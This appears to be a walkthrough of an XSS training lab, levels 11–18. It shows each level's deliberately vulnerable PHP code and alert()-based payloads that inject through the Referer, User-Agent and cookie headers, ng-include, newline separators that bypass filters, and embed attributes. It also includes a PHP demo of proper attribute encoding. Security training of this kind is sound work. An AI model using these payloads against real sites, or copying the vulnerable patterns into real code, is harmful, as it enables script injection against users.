Level 11
Source code:
<?php
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_REFERER'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link" value="'.'" type="hidden">
<input name="t_history" value="'.'" type="hidden">
<input name="t_sort" value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ref" value="'.$str33.'" type="hidden">
</form>
</center>';
?>
<?php
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>
The HTTP_REFERER variable points us to the HTTP headers, so the XSS injection can be done through a request header; in this level the injection point is clearly the Referer. Burp Suite or the Firefox HackBar plugin both work; here we simply intercept the request with Burp Suite and modify the Referer to:
" onclick="alert()" type="text
Level 12
Source code:
<?php
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_USER_AGENT'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link" value="'.'" type="hidden">
<input name="t_history" value="'.'" type="hidden">
<input name="t_sort" value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ua" value="'.$str33.'" type="hidden">
</form>
</center>';
?>
<?php
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>
This time the value comes from the User-Agent, so intercept the request and modify that header:
" onclick="alert(1)" type="text
Level 13
Source code:
<?php
setcookie("user", "call me maybe?", time()+3600);
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_COOKIE["user"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link" value="'.'" type="hidden">
<input name="t_history" value="'.'" type="hidden">
<input name="t_sort" value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_cook" value="'.$str33.'" type="hidden">
</form>
</center>';
?>
<?php
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>
Same as the previous levels, except that this time we modify the cookie:
" onclick=alert(1) type="text
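Levels 11, 12 and 13 share one defect: the Referer, User-Agent or cookie value is only stripped of `<` and `>`, then printed inside a double-quoted attribute, where a quote is the character that matters. The following is an added example (not the lab's code) that reimplements that filter beside a hardened `htmlspecialchars` version and parses the rendered element to show which attributes a browser would actually receive; the payload string is constructed for the demonstration.

```php
<?php
// Added example, not the lab's code. Reimplements the level 11-13 filter
// beside a hardened version, then parses the rendered <input> to see which
// attributes an HTML parser really ends up with.

// The lab's filter: removes angle brackets but leaves quotes untouched.
function lab_filter(string $value): string
{
    return str_replace(["<", ">"], "", $value);
}

// Hardened version: encode for an HTML attribute context. ENT_QUOTES covers
// both quote characters; ENT_SUBSTITUTE keeps invalid UTF-8 from emptying
// the output instead of silently dropping it.
function safe_attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Same template the lab uses for its hidden inputs.
function render_hidden(string $name, string $value): string
{
    return '<input name="' . $name . '" value="' . $value . '" type="hidden">';
}

// Parse the rendered markup with a lenient HTML parser and return the
// attributes the first <input> element carries after parsing.
function parsed_input_attributes(string $html): array
{
    libxml_use_internal_errors(true);           // ignore the parser's complaints
    $doc = new DOMDocument();
    $doc->loadHTML('<!DOCTYPE html><html><body>' . $html . '</body></html>');
    $input = $doc->getElementsByTagName('input')->item(0);
    $attrs = [];
    foreach ($input->attributes as $attr) {
        $attrs[$attr->name] = $attr->value;     // entity-decoded by the parser
    }
    return $attrs;
}

// Constructed sample: the shape of the header/cookie payload used in these levels.
$payload = '" onclick="alert(1)" type="text';

$vulnerable = parsed_input_attributes(render_hidden('t_ref', lab_filter($payload)));
$hardened   = parsed_input_attributes(render_hidden('t_ref', safe_attr($payload)));

printf("lab filter: onclick attribute present = %s\n", isset($vulnerable['onclick']) ? 'yes' : 'no');
printf("safe_attr : onclick attribute present = %s, value = %s\n",
    isset($hardened['onclick']) ? 'yes' : 'no', $hardened['value']);
```

With the lab's filter the parsed element gains an onclick attribute; with `safe_attr` the whole payload, quotes included, survives only as the decoded value attribute.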
Level 15
Source code:
<?php
ini_set("display_errors", 0);
$str = $_GET["src"];
echo '<body><span class="ng-include:'.htmlspecialchars($str).'"></span></body>';
?>
ng-include means including a file, roughly the equivalent of include in PHP.
The script src address in the page cannot be reached.
First replace it with an address that is reachable from China:
https://cdn.staticfile.org/angular.js/1.4.6/angular.min.js
Since HTML files can be included here, we can also include the source of an earlier level that already had an XSS vulnerability:
?src='level1.php?name=<img src=1 onerror=alert(1)>'
The onerror handler of <img> fires when the image URL fails to load; it is normally used to show a fallback image.
A few points worth special attention:
1. With ng-include, if you simply specify an address, it must be enclosed in quotes.
2. When ng-include loads external HTML, the content of script tags is not executed.
3. When ng-include loads external HTML, the styles in its style tags are recognized.
Level 16
Source code:
<?php
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);           // case variations are neutralised
$str2=str_replace("script","&nbsp;",$str);     // "script" is replaced
$str3=str_replace(" ","&nbsp;",$str2);         // spaces are replaced
$str4=str_replace("/","&nbsp;",$str3);         // slashes are replaced
$str5=str_replace("\t","&nbsp;",$str4);        // the original contains a literal tab here
echo "<center>".$str5."</center>";
?>
<?php
echo "<h3 align=center>payload的长度:".strlen($str5)."</h3>";
?>
script, /, spaces and case variations are all filtered, so we use %0d or %0a as the attribute separator instead:
<img%0Dsrc=1%0Donerror=alert(1)>
<iframe%0asrc=x%0donmouseover=alert`1`></iframe>
<svg%0aonload=alert`1`></svg>
Level 17
Source code:
<?php
ini_set("display_errors", 0);
echo "<embed src=xsf01.swf?".htmlspecialchars($_GET["arg01"])."=".htmlspecialchars($_GET["arg02"])." width=100% heigth=100%>";
?>
arg01=1&arg02= onmouseover=alert(1)
Level 18
Source code:
<?php
ini_set("display_errors", 0);
echo "<embed src=xsf02.swf?".htmlspecialchars($_GET["arg01"])."=".htmlspecialchars($_GET["arg02"])." width=100% heigth=100%>";
?>
Same as level 17.